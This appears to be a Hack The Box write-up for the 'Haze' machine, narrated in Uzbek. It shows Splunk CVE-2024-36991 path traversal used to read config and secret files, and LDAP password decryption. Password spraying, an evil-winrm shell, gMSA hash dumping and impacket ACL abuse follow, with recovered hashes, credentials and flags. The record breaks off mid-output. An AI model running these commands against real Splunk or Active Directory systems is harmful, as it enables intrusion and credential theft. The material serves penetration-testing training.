Haze

Umumiy Ma’lumotlar
IP address 10.10.11.61
Operatsion Tizim Nomi (Distribution) Microsoft Windows Server 2022 Standard
Operatsion Tizim Kernel Verisyasi 10.0.20348 N/A Build 20348
Web Server dasturi va Versiyasi Splunkd httpd 9.2.1

53, 88, 135, 139, 389, 445, 464, 593, 636, 3268,
Ochiq Portlar
3269, 5985, 8000, 8088, 8089

Topilgan Flaglar

💡 Flag ni belgilangan bo’limga nusxa ko’chirib tashlang. Bundan tashqari flag topilgan ekran screenshotini ham
ushbu bo’limga tashlang.

User Flag

💡 User Flag: 4e05595e91d9d1935b6d9124ff1c8c63

Root Flag

💡 Root Flag: 900dc84bcaed8c08c3aac7ad55e86ed9

Toplgan Zaifliklar

Haze 1
 💡 Har bitta topilgan zaiflikni shu yerda to’ldirib, u haqida batafsil malumot olish uchun link qoldirasiz. U zaiflik
nimalarga saba bo’lishi va qaysi explit orqali buzilishinni ham shu yerda tushuntirib berishingiz kerak. Birnchida
keltirilgan zaiflik bu sizga misol sifatida keltirilgan. Nechta zaiflik topa olsangiz barchasini kiriting.

Ushbu CVE x dasturining 2.X.X-versiyasida mavjud

Exploit linki berilishi
bo’lib, hujumchiga X hujumni amalga oshirishga yordam
CVE-XXXX-XXXX kerak agar mavjud
beradi. Bu zaiflik X zailik deb ataladi. Ushu havola orqali
bo’lsa
batafsil o’rganib chiqish mumkin. [Link qoldirasiz.]

Hisobot

💡 Har bitta bosqichda qilgan ishlaringizni batafsil, screenshotlar, foydalanilgan explitlar bilan tushuntirib yozing.

Enumeration (Ma’lumot to’plash)

㉿
┌──(kali kali)-[~]
└─$ nmap -sSCV -Pn 10.10.11.61 -min-rate 10000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-29 15:16 EDT
Nmap scan report for 10.10.11.61
Host is up (0.10s latency).
Not shown: 985 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-03-30 03:16:21Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Na
me)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after: 2026-03-05T07:12:20
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-N
ame)
| ssl-cert: Subject: commonName=dc01.haze.htb

Haze 2
 | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after: 2026-03-05T07:12:20
|_ssl-date: TLS randomness does not represent time
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Na
me)
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after: 2026-03-05T07:12:20
|_ssl-date: TLS randomness does not represent time
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-N
ame)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after: 2026-03-05T07:12:20
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8000/tcp open http Splunkd httpd
| http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_Requested resource was http://10.10.11.61:8000/en-US/account/login?return_to=%2Fen-US%2F
|_http-server-header: Splunkd
| http-robots.txt: 1 disallowed entry
|_/
8088/tcp open ssl/http Splunkd httpd
|_http-title: 404 Not Found
|_http-server-header: Splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2025-03-05T07:29:08
|_Not valid after: 2028-03-04T07:29:08
8089/tcp open ssl/http Splunkd httpd
| http-robots.txt: 1 disallowed entry
|_/
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2025-03-05T07:29:08
|_Not valid after: 2028-03-04T07:29:08
|_http-title: splunkd
|_http-server-header: Splunkd
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:

| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-03-30T03:17:09
|_ start_date: N/A
|_clock-skew: 8h00m00s

Haze 3
 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 66.21 seconds

Bizda 8000 portda website bor endi unga kirib ko’ramiz va undan oldin /etc/hostsga domen qo’shamiz

㉿
┌──(kali kali)-[~/Desktop/HTB/Haze]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.10.11.61 haze.htb dc01.haze.htb

Splunk dasturi borakan endi unga cve qidirib ko’ramiz

Endi githubdan shu cveni qidiramiz

Haze 4
 Exploitation (Buzib kirish)
Endi yuklab ishlatib ko’ramiz

┌──(kali ㉿kali)-[~/Desktop/HTB/Haze]
└─$ git clone https://github.com/bigb0x/CVE-2024-36991.git
Cloning into 'CVE-2024-36991'...
remote: Enumerating objects: 22, done.
remote: Counting objects: 100% (22/22), done.
remote: Compressing objects: 100% (20/20), done.
remote: Total 22 (delta 4), reused 0 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (22/22), 135.19 KiB | 456.00 KiB/s, done.
Resolving deltas: 100% (4/4), done.

┌──(kali ㉿kali)-[~/Desktop/HTB/Haze]
└─$ ll
total 4
drwxrwxr-x 4 kali kali 4096 Mar 29 15:28 CVE-2024-36991

㉿
┌──(kali kali)-[~/Desktop/HTB/Haze]
└─$ cd CVE-2024-36991

┌──(kali ㉿kali)-[~/Desktop/HTB/Haze/CVE-2024-36991]
└─$ ll
total 16
-rw-rw-r-- 1 kali kali 5157 Mar 29 15:28 CVE-2024-36991.py
-rw-rw-r-- 1 kali kali 1570 Mar 29 15:28 README.md
drwxrwxr-x 2 kali kali 4096 Mar 29 15:28 screens

Haze 5
 ┌──(kali ㉿kali)-[~/Desktop/HTB/Haze/CVE-2024-36991]
└─$ python3 CVE-2024-36991.py -u http://haze.htb:8000
/home/kali/Desktop/HTB/Haze/CVE-2024-36991/CVE-2024-36991.py:53: SyntaxWarning: invalid escape sequence
'\ '
""")

______ _______ ____ ___ ____ _ _ _____ __ ___ ___ _

/ ___\ \ / | ____| |___ \ / _ |___ \| || | |___ / / /_ / _ \ / _ \/ |
| | \ \ / /| _| _____ __) | | | |__) | || |_ _____ |_ \| '_ | (_) | (_) | |
| |___ \ V / | |__|_____/ __/| |_| / __/|__ _|________) | (_) \__, |\__, | |
\____| \_/ |_____| |_____|\___|_____| |_| |____/ \___/ /_/ /_/|_|

-> POC CVE-2024-36991. This exploit will attempt to read Splunk /etc/passwd file.
-> By x.com/MohamedNab1l
-> Use Wisely.

[INFO] Log directory created: logs

[INFO] Testing single target: http://haze.htb:8000
[VLUN] Vulnerable: http://haze.htb:8000
:admin:$6$Ak3m7.aHgb/NOQez$O7C8Ck2lg5RaXJs9FrwPr7xbJBJxMCpqIx3TG30Pvl7JSvv0pn3vtYnt8qF4WhL7hB
Zygwemqn7PBj5dLBm0D1::Administrator:admin:changeme@example.com:::20152
:edward:$6$3LQHFzfmlpMgxY57$Sk32K6eknpAtcT23h6igJRuM1eCe7WAfygm103cQ22/Niwp1pTCKzc0Ok1qhV25U
soUN4t7HYfoGDb4ZCv8pw1::Edward@haze.htb:user:Edward@haze.htb:::20152
:mark:$6$j4QsAJiV8mLg/bhA$Oa/l2cgCXF8Ux7xIaDe3dMW6.Qfobo0PtztrVMHZgdGa1j8423jUvMqYuqjZa/LPd.xry
Uwe699/8SgNC6v2H/:::user:Mark@haze.htb:::20152
:paul:$6$Y5ds8NjDLd7SzOTW$Zg/WOJxk38KtI.ci9RFl87hhWSawfpT6X.woxTvB4rduL4rDKkE.psK7eXm6TgriABAhq
dCPI4P0hcB8xz0cd1:::user:paul@haze.htb:::20152

Bizda hash bor lekin crack qilib bo’lmadi endi burp suite bilan shu cveda ko’rsatilgandek ma’lumot olishga harakat
qilamiz
https://www.sonicwall.com/blog/critical-splunk-vulnerability-cve-2024-36991-patch-now-to-prevent-arbitrary-file-
reads

Haze 6
 # Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host

# localhost name resolution is handled within DNS itself.

# 127.0.0.1 localhost
# ::1 localhost

Endi authentication.conf file tekshiramiz /en-/en-

US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../C:/Program%20Files/Splunk/etc/system/local/a

Haze 7
 [splunk_auth]
minPasswordLength = 8
minPasswordUppercase = 0
minPasswordLowercase = 0
minPasswordSpecial = 0
minPasswordDigit = 0

[Haze LDAP Auth]

SSLEnabled = 0
anonymous_referrals = 1
bindDN = CN=Paul Taylor,CN=Users,DC=haze,DC=htb
bindDNpassword = $7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY
=
charset = utf8
emailAttribute = mail
enableRangeRetrieval = 0
groupBaseDN = CN=Splunk_LDAP_Auth,CN=Users,DC=haze,DC=htb
groupMappingAttribute = dn
groupMemberAttribute = member
groupNameAttribute = cn
host = dc01.haze.htb
nestedGroups = 0
network_timeout = 20
pagelimit = -1
port = 389
realNameAttribute = cn
sizelimit = 1000
timelimit = 15
userBaseDN = CN=Users,DC=haze,DC=htb
userNameAttribute = samaccountname

[authentication]
authSettings = Haze LDAP Auth
authType = LDAP

Haze 8
 https://github.com/HurricaneLabs/splunksecrets

┌──(kali㉿kali)-[~/Desktop/HTB/Haze]
└─$ git clone https://github.com/HurricaneLabs/splunksecrets.git
Cloning into 'splunksecrets'...
remote: Enumerating objects: 344, done.
remote: Counting objects: 100% (23/23), done.
remote: Compressing objects: 100% (8/8), done.
remote: Total 344 (delta 20), reused 15 (delta 15), pack-reused 321 (from 1)
Receiving objects: 100% (344/344), 89.25 KiB | 247.00 KiB/s, done.
Resolving deltas: 100% (204/204), done.

┌──(kali㉿kali)-[~/Desktop/HTB/Haze]
└─$ cd splunksecrets

┌──(kali㉿kali)-[~/Desktop/HTB/Haze/splunksecrets]
└─$ python3 -m venv venv

┌──(kali㉿kali)-[~/Desktop/HTB/Haze/splunksecrets]
└─$ source venv/bin/activate

┌──(venv)─(kali ㉿kali)-[~/Desktop/HTB/Haze/splunksecrets]
└─$ pip3 install splunksecrets
Collecting splunksecrets
Downloading splunksecrets-1.0.0.tar.gz (8.4 kB)
Installing build dependencies ... done
Getting requirements to build wheel ... done
Preparing metadata (pyproject.toml) ... done
Collecting click>=8.0.0 (from splunksecrets)
Using cached click-8.1.8-py3-none-any.whl.metadata (2.3 kB)
Collecting cryptography>=3.2 (from splunksecrets)
Using cached cryptography-44.0.2-cp39-abi3-manylinux_2_34_x86_64.whl.metadata (5.7 kB)
Collecting pcrypt (from splunksecrets)
Downloading pcrypt-1.0.5.tar.gz (6.0 kB)

Haze 9
 ㉿
┌──(venv)─(kali kali)-[~/Desktop/HTB/Haze/splunksecrets]
└─$ curl -s "http://haze.htb:8000/en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../C:/Progra
m%20Files/Splunk/etc/auth/splunk.secret"
NfKeJCdFGKUQUqyQmnX/WM9xMn5uVF32qyiofYPHkEOGcpMsEN.lRPooJnBdEL5Gh2wm12jKEytQoxsAYA5mReU
9.h0SYEwpFMDyyAuTqhnba9P2Kul0dyBizLpq6Nq5qiCTBK3UM516vzArIkZvWQLk3Bqm1YylhEfdUvaw1ngVqR1oRtg
54qf4jG0X16hNDhXokoyvgb44lWcH33FrMXxMvzFKd5W3TaAUisO6rnN0xqB7cHbofaA1YV9vgD
㉿
┌──(venv)─(kali kali)-[~/Desktop/HTB/Haze/splunksecrets]
└─$ vim splunk.secret

㉿
┌──(venv)─(kali kali)-[~/Desktop/HTB/Haze/splunksecrets]
└─$ splunksecrets splunk-decrypt -S splunk.secret
Ciphertext: $7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY=
Ld@p_Auth_Sp1unk@2k24

user: Paul Taylor

password: Ld@p_Auth_Sp1unk@2k24
Endi nxc bilan scan qilamiz

㉿
┌──(kali kali)-[~/Desktop/HTB/Haze/CVE-2024-36991]
└─$ nxc smb haze.htb -u 'paul.taylor' -p 'Ld@p_Auth_Sp1unk@2k24' --rid-brute
SMB 10.10.11.61 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.ht
b) (signing:True) (SMBv1:False)
SMB 10.10.11.61 445 DC01 [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24
SMB 10.10.11.61 445 DC01 498: HAZE\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.11.61 445 DC01 500: HAZE\Administrator (SidTypeUser)
SMB 10.10.11.61 445 DC01 501: HAZE\Guest (SidTypeUser)
SMB 10.10.11.61 445 DC01 502: HAZE\krbtgt (SidTypeUser)
SMB 10.10.11.61 445 DC01 512: HAZE\Domain Admins (SidTypeGroup)
SMB 10.10.11.61 445 DC01 513: HAZE\Domain Users (SidTypeGroup)
SMB 10.10.11.61 445 DC01 514: HAZE\Domain Guests (SidTypeGroup)
SMB 10.10.11.61 445 DC01 515: HAZE\Domain Computers (SidTypeGroup)
SMB 10.10.11.61 445 DC01 516: HAZE\Domain Controllers (SidTypeGroup)
SMB 10.10.11.61 445 DC01 517: HAZE\Cert Publishers (SidTypeAlias)
SMB 10.10.11.61 445 DC01 518: HAZE\Schema Admins (SidTypeGroup)
SMB 10.10.11.61 445 DC01 519: HAZE\Enterprise Admins (SidTypeGroup)

Haze 10
 SMB 10.10.11.61 445 DC01 520: HAZE\Group Policy Creator Owners (SidTypeGroup)
SMB 10.10.11.61 445 DC01 521: HAZE\Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.11.61 445 DC01 522: HAZE\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.10.11.61 445 DC01 525: HAZE\Protected Users (SidTypeGroup)
SMB 10.10.11.61 445 DC01 526: HAZE\Key Admins (SidTypeGroup)
SMB 10.10.11.61 445 DC01 527: HAZE\Enterprise Key Admins (SidTypeGroup)
SMB 10.10.11.61 445 DC01 553: HAZE\RAS and IAS Servers (SidTypeAlias)
SMB 10.10.11.61 445 DC01 571: HAZE\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.10.11.61 445 DC01 572: HAZE\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.10.11.61 445 DC01 1000: HAZE\DC01$ (SidTypeUser)
SMB 10.10.11.61 445 DC01 1101: HAZE\DnsAdmins (SidTypeAlias)
SMB 10.10.11.61 445 DC01 1102: HAZE\DnsUpdateProxy (SidTypeGroup)
SMB 10.10.11.61 445 DC01 1103: HAZE\paul.taylor (SidTypeUser)
SMB 10.10.11.61 445 DC01 1104: HAZE\mark.adams (SidTypeUser)
SMB 10.10.11.61 445 DC01 1105: HAZE\edward.martin (SidTypeUser)
SMB 10.10.11.61 445 DC01 1106: HAZE\alexander.green (SidTypeUser)
SMB 10.10.11.61 445 DC01 1107: HAZE\gMSA_Managers (SidTypeGroup)
SMB 10.10.11.61 445 DC01 1108: HAZE\Splunk_Admins (SidTypeGroup)
SMB 10.10.11.61 445 DC01 1109: HAZE\Backup_Reviewers (SidTypeGroup)
SMB 10.10.11.61 445 DC01 1110: HAZE\Splunk_LDAP_Auth (SidTypeGroup)
SMB 10.10.11.61 445 DC01 1111: HAZE\Haze-IT-Backup$ (SidTypeUser)
SMB 10.10.11.61 445 DC01 1112: HAZE\Support_Services (SidTypeGroup)

㉿
┌──(venv)─(kali kali)-[~/Desktop/HTB/Haze/splunksecrets]
└─$ nxc smb haze.htb -u 'paul.taylor' -p 'Ld@p_Auth_Sp1unk@2k24' --rid-brute | grep "SidTypeUser"
SMB 10.10.11.61 445 DC01 500: HAZE\Administrator (SidTypeUser)
SMB 10.10.11.61 445 DC01 501: HAZE\Guest (SidTypeUser)
SMB 10.10.11.61 445 DC01 502: HAZE\krbtgt (SidTypeUser)
SMB 10.10.11.61 445 DC01 1000: HAZE\DC01$ (SidTypeUser)
SMB 10.10.11.61 445 DC01 1103: HAZE\paul.taylor (SidTypeUser)
SMB 10.10.11.61 445 DC01 1104: HAZE\mark.adams (SidTypeUser)
SMB 10.10.11.61 445 DC01 1105: HAZE\edward.martin (SidTypeUser)
SMB 10.10.11.61 445 DC01 1106: HAZE\alexander.green (SidTypeUser)
SMB 10.10.11.61 445 DC01 1111: HAZE\Haze-IT-Backup$ (SidTypeUser)

Endi userlarni ajratib olamiz

┌──(venv)─(kali ㉿kali)-[~/Desktop/HTB/Haze/splunksecrets]
└─$ nxc smb haze.htb -u 'paul.taylor' -p 'Ld@p_Auth_Sp1unk@2k24' --rid-brute | grep "SidTypeUser"
SMB 10.10.11.61 445 DC01 500: HAZE\Administrator (SidTypeUser)
SMB 10.10.11.61 445 DC01 501: HAZE\Guest (SidTypeUser)
SMB 10.10.11.61 445 DC01 502: HAZE\krbtgt (SidTypeUser)
SMB 10.10.11.61 445 DC01 1000: HAZE\DC01$ (SidTypeUser)
SMB 10.10.11.61 445 DC01 1103: HAZE\paul.taylor (SidTypeUser)
SMB 10.10.11.61 445 DC01 1104: HAZE\mark.adams (SidTypeUser)
SMB 10.10.11.61 445 DC01 1105: HAZE\edward.martin (SidTypeUser)
SMB 10.10.11.61 445 DC01 1106: HAZE\alexander.green (SidTypeUser)
SMB 10.10.11.61 445 DC01 1111: HAZE\Haze-IT-Backup$ (SidTypeUser)

㉿
┌──(venv)─(kali kali)-[~/Desktop/HTB/Haze/splunksecrets]
└─$ nxc smb haze.htb -u 'paul.taylor' -p 'Ld@p_Auth_Sp1unk@2k24' --rid-brute | grep "SidTypeUser" | awk -F '\\'
'{print $2}' | awk '{print $1}' > users.txt

┌──(venv)─(kali ㉿kali)-[~/Desktop/HTB/Haze/splunksecrets]

Haze 11
 └─$ cat users.txt
Administrator
Guest
krbtgt
DC01$
paul.taylor
mark.adams
edward.martin
alexander.green
Haze-IT-Backup$

Endi evil-winrm orqali bog’lanishimiz mumkun bo’lgan userlarni aniqlashga harakat qilamiz va
Ld@p_Auth_Sp1unk@2k24 passwordimizda sinab ko’ramiz

㉿
┌──(venv)─(kali kali)-[~/Desktop/HTB/Haze/splunksecrets]
└─$ crackmapexec winrm 10.10.11.61 -u users.txt -p 'Ld@p_Auth_Sp1unk@2k24' -d haze.htb
HTTP 10.10.11.61 5985 10.10.11.61 [*] http://10.10.11.61:5985/wsman
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been
moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 10.10.11.61 5985 10.10.11.61 [-] haze.htb\Administrator:Ld@p_Auth_Sp1unk@2k24
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been
moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 10.10.11.61 5985 10.10.11.61 [-] haze.htb\Guest:Ld@p_Auth_Sp1unk@2k24
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been
moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 10.10.11.61 5985 10.10.11.61 [-] haze.htb\krbtgt:Ld@p_Auth_Sp1unk@2k24
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been
moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 10.10.11.61 5985 10.10.11.61 [-] haze.htb\DC01$:Ld@p_Auth_Sp1unk@2k24
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been
moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 10.10.11.61 5985 10.10.11.61 [-] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been
moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 10.10.11.61 5985 10.10.11.61 [+] haze.htb\mark.adams:Ld@p_Auth_Sp1unk@2k24 (Pwn3d!)

bizda mark.adams kira olar ekan endi bog’lanib ko’ramiz

Initial Access (Kirish huquqiga erishish)

┌──(venv)─(kali ㉿kali)-[~/Desktop/HTB/Haze/splunksecrets]
└─$ evil-winrm -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24' -i haze.htb

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplem
ented on this machine

Haze 12
 Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-co
mpletion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\mark.adams\Documents>

Group Managed Service Accounts (gMSA) olishga harakat qilamiz userimiz bilan

https://github.com/micahvandeusen/gMSADumper

┌──(kali ㉿kali)-[~/Desktop/HTB/Haze/gMSADumper]
└─$ python3 gMSADumper.py -u mark.adams -p 'Ld@p_Auth_Sp1unk@2k24' -d haze.htb -l dc01.haze.htb
Users or groups who can read password for Haze-IT-Backup$:
> Domain Admins

==============================================================
*Evil-WinRM* PS C:\Users\mark.adams\Desktop> Set-ADServiceAccount -Identity Haze-IT-Backup$ -PrincipalsAllo
wedToRetrieveManagedPassword "mark.adams"

=========================================================================
㉿
┌──(kali kali)-[~/Desktop/HTB/Haze/gMSADumper]
└─$ python3 gMSADumper.py -u mark.adams -p 'Ld@p_Auth_Sp1unk@2k24' -d haze.htb -l haze.htb
Users or groups who can read password for Haze-IT-Backup$:
> mark.adams
Haze-IT-Backup$:::735c02c6b2dc54c3c8c6891f55279ebc
Haze-IT-Backup$:aes256-cts-hmac-sha1-96:38c90a95f7e038a6cb57d3e21c405c2875e88f1edbb1e082f1dd75d01e
da60fd
Haze-IT-Backup$:aes128-cts-hmac-sha1-96:0926f5e64d85018a506ecadff3df4f95

Haze 13
 SUPPORT_SERVICES ob'yektining egaligini Haze-IT-Backup$ foydalanuvchisiga o'zgartiramiz

㉿
┌──(kali kali)-[~/Desktop/HTB/Haze]
└─$ impacket-owneredit -action write -target 'SUPPORT_SERVICES' -new-owner 'Haze-IT-Backup$' haze.htb/'Haz
e-IT-Backup$' -hashes ':735c02c6b2dc54c3c8c6891f55279ebc' -dc-ip haze.htb

/usr/share/doc/python3-impacket/examples/owneredit.py:87: SyntaxWarning: invalid escape sequence '\V'

'S-1-5-83-0': 'NT VIRTUAL MACHINE\Virtual Machines',
/usr/share/doc/python3-impacket/examples/owneredit.py:96: SyntaxWarning: invalid escape sequence '\P'
'S-1-5-32-554': 'BUILTIN\Pre-Windows 2000 Compatible Access',
/usr/share/doc/python3-impacket/examples/owneredit.py:97: SyntaxWarning: invalid escape sequence '\R'
'S-1-5-32-555': 'BUILTIN\Remote Desktop Users',
/usr/share/doc/python3-impacket/examples/owneredit.py:98: SyntaxWarning: invalid escape sequence '\I'
'S-1-5-32-557': 'BUILTIN\Incoming Forest Trust Builders',
/usr/share/doc/python3-impacket/examples/owneredit.py:100: SyntaxWarning: invalid escape sequence '\P'
'S-1-5-32-558': 'BUILTIN\Performance Monitor Users',
/usr/share/doc/python3-impacket/examples/owneredit.py:101: SyntaxWarning: invalid escape sequence '\P'
'S-1-5-32-559': 'BUILTIN\Performance Log Users',
/usr/share/doc/python3-impacket/examples/owneredit.py:102: SyntaxWarning: invalid escape sequence '\W'
'S-1-5-32-560': 'BUILTIN\Windows Authorization Access Group',
/usr/share/doc/python3-impacket/examples/owneredit.py:103: SyntaxWarning: invalid escape sequence '\T'
'S-1-5-32-561': 'BUILTIN\Terminal Server License Servers',
/usr/share/doc/python3-impacket/examples/owneredit.py:104: SyntaxWarning: invalid escape sequence '\D'
'S-1-5-32-562': 'BUILTIN\Distributed COM Users',
/usr/share/doc/python3-impacket/examples/owneredit.py:105: SyntaxWarning: invalid escape sequence '\C'
'S-1-5-32-569': 'BUILTIN\Cryptographic Operators',
/usr/share/doc/python3-impacket/examples/owneredit.py:106: SyntaxWarning: invalid escape sequence '\E'
'S-1-5-32-573': 'BUILTIN\Event Log Readers',

Haze 14
 /usr/share/doc/python3-impacket/examples/owneredit.py:107: SyntaxWarning: invalid escape sequence '\C'
'S-1-5-32-574': 'BUILTIN\Certificate Service DCOM Access',
/usr/share/doc/python3-impacket/examples/owneredit.py:108: SyntaxWarning: invalid escape sequence '\R'
'S-1-5-32-575': 'BUILTIN\RDS Remote Access Servers',
/usr/share/doc/python3-impacket/examples/owneredit.py:109: SyntaxWarning: invalid escape sequence '\R'
'S-1-5-32-576': 'BUILTIN\RDS Endpoint Servers',
/usr/share/doc/python3-impacket/examples/owneredit.py:110: SyntaxWarning: invalid escape sequence '\R'
'S-1-5-32-577': 'BUILTIN\RDS Management Servers',
/usr/share/doc/python3-impacket/examples/owneredit.py:111: SyntaxWarning: invalid escape sequence '\H'
'S-1-5-32-578': 'BUILTIN\Hyper-V Administrators',
/usr/share/doc/python3-impacket/examples/owneredit.py:112: SyntaxWarning: invalid escape sequence '\A'
'S-1-5-32-579': 'BUILTIN\Access Control Assistance Operators',
/usr/share/doc/python3-impacket/examples/owneredit.py:113: SyntaxWarning: invalid escape sequence '\R'
'S-1-5-32-580': 'BUILTIN\Remote Management Users',
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Current owner information below

[*] - SID: S-1-5-21-323145914-28650650-2368316563-512
[*] - sAMAccountName: Domain Admins
[*] - distinguishedName: CN=Domain Admins,CN=Users,DC=haze,DC=htb
[*] OwnerSid modified successfully!

Siz Haze-IT-Backup$ foydalanuvchisiga SUPPORT_SERVICES ob'yekti ustidan to'liq boshqaruv huquqi beramiz

┌──(kali ㉿kali)-[~/Desktop/HTB/Haze]
└─$ impacket-dacledit -action write -rights FullControl -target 'SUPPORT_SERVICES' -principal 'Haze-IT-Backup$'
haze.htb/'Haze-IT-Backup$' -hashes ':735c02c6b2dc54c3c8c6891f55279ebc' -dc-ip haze.htb
/usr/share/doc/python3-impacket/examples/dacledit.py:101: SyntaxWarning: invalid escape sequence '\V'
'S-1-5-83-0': 'NT VIRTUAL MACHINE\Virtual Machines',
/usr/share/doc/python3-impacket/examples/dacledit.py:110: SyntaxWarning: invalid escape sequence '\P'
'S-1-5-32-554': 'BUILTIN\Pre-Windows 2000 Compatible Access',
/usr/share/doc/python3-impacket/examples/dacledit.py:111: SyntaxWarning: invalid escape sequence '\R'
'S-1-5-32-555': 'BUILTIN\Remote Desktop Users',
/usr/share/doc/python3-impacket/examples/dacledit.py:112: SyntaxWarning: invalid escape sequence '\I'
'S-1-5-32-557': 'BUILTIN\Incoming Forest Trust Builders',
/usr/share/doc/python3-impacket/examples/dacledit.py:114: SyntaxWarning: invalid escape sequence '\P'
'S-1-5-32-558': 'BUILTIN\Performance Monitor Users',
/usr/share/doc/python3-impacket/examples/dacledit.py:115: SyntaxWarning: invalid escape sequence '\P'
'S-1-5-32-559': 'BUILTIN\Performance Log Users',
/usr/share/doc/python3-impacket/examples/dacledit.py:116: SyntaxWarning: invalid escape sequence '\W'
'S-1-5-32-560': 'BUILTIN\Windows Authorization Access Group',
/usr/share/doc/python3-impacket/examples/dacledit.py:117: SyntaxWarning: invalid escape sequence '\T'
'S-1-5-32-561': 'BUILTIN\Terminal Server License Servers',
/usr/share/doc/python3-impacket/examples/dacledit.py:118: SyntaxWarning: invalid escape sequence '\D'
'S-1-5-32-562': 'BUILTIN\Distributed COM Users',
/usr/share/doc/python3-impacket/examples/dacledit.py:119: SyntaxWarning: invalid escape sequence '\C'
'S-1-5-32-569': 'BUILTIN\Cryptographic Operators',
